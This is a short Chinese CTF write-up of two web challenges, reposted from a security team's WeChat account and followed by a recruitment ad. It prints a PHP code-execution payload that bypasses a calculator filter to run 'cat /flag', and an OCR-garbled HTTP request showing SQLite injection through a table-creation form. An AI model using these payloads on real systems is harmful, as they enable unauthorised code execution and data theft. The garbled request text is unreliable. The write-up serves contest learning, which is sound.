全国工业互联网安全技术技能大赛部分wp

admin 2020年10月24日21:53:50评论816 views字数 1452阅读4分50秒阅读模式

点击蓝字 ·  关注我们

01

web题 SimpleCalculator


题目:简单的计算器


全国工业互联网安全技术技能大赛部分wp


进去后发现flag.php计算功能可绕过执行shell

http://eci-2zei447jhyte2gq76fli.cloudeci1.ichunqiu.com/flag.php?search=$pi=(is_nan^(6).(4)).(tan^(1).(5));$pi=$$pi;$pi{0}($pi{1})&0=system&1=cat%20/flag


得到flag


全国工业互联网安全技术技能大赛部分wp


02

web题SQLManager

题目:简易的SQLite管理器


全国工业互联网安全技术技能大赛部分wp


这题存在注入在建表包注入

POST / ?page=build HITP/1.1Host : eci-2zecngytglno3p52gmqv.cloudecil.ichunqiu.comCont ent-Length : 89cache-Control : max-age=oupgrade-Insecure-Requests: lorigin: http: lleci-2zecngytg1no3p52gmqv.cloudecil.ichunqiu.comContent -Type: application/x-www-form-urlencodedUser-Agent : Mozilla/5.0 (x11; Linux x86_64) ApplewebKit/537.36(KHTML,like Gecko) chrome/83.0.4103.97 Safari/537.36Accept :text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=o.9Referer:http:/leci-2zecngytg1no3p52gmIy.cloudecil.ichunqiu.com/?page=indexAccept -Encoding: gzip, deflateAccept -Language: en-US,en; q=0.9,zh-CN; q=0.8,zh; q=0.7Cookie: PHPSESSID=ffb90ec69o5f7bef2a6e8fa2da7o55of; _jsluid_h=beoc26aac69b12099a0b0aa54df37ca2Connection: closetable_name=aaa as select sql as[ &columns[ o] [ name]=]fronsqlite_master ; &columns[o] [type]-2

全国工业互联网安全技术技能大赛部分wp


获得表名,表列


全国工业互联网安全技术技能大赛部分wp

然后获得flag


全国工业互联网安全技术技能大赛部分wp


flag{914162a9-5a2e-4b80-9d74-93c119a3ef86}

03

Tip

你是否想要加入一个安全团队
拥有更好的学习氛围?

那就加入EDI安全吧,这里门槛不是很高,但师傅们经验丰富,可以带着你一起从基础开始,只要你有持之以恒努力的决心,下一个CTF大牛就是你。

我们诚招Web、Pwn、Re、Crypto和Blockchain方向的师傅们,不论年龄、不论性别,EDI为大家提供一个共同学习,一同进步的平台。

我们在为打造安全圈好的技术氛围而努力,这里绝对是你学习技术的好地方。


有意向的师傅请联系我们的无剧师傅

全国工业互联网安全技术技能大赛部分wp

EDI安全

全国工业互联网安全技术技能大赛部分wp

扫二维码|关注我们

一个专注渗透实战经验分享的公众号


本文始发于微信公众号(EDI安全):全国工业互联网安全技术技能大赛部分wp

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年10月24日21:53:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   全国工业互联网安全技术技能大赛部分wphttp://cn-sec.com/archives/169506.html

发表评论

匿名网友 填写信息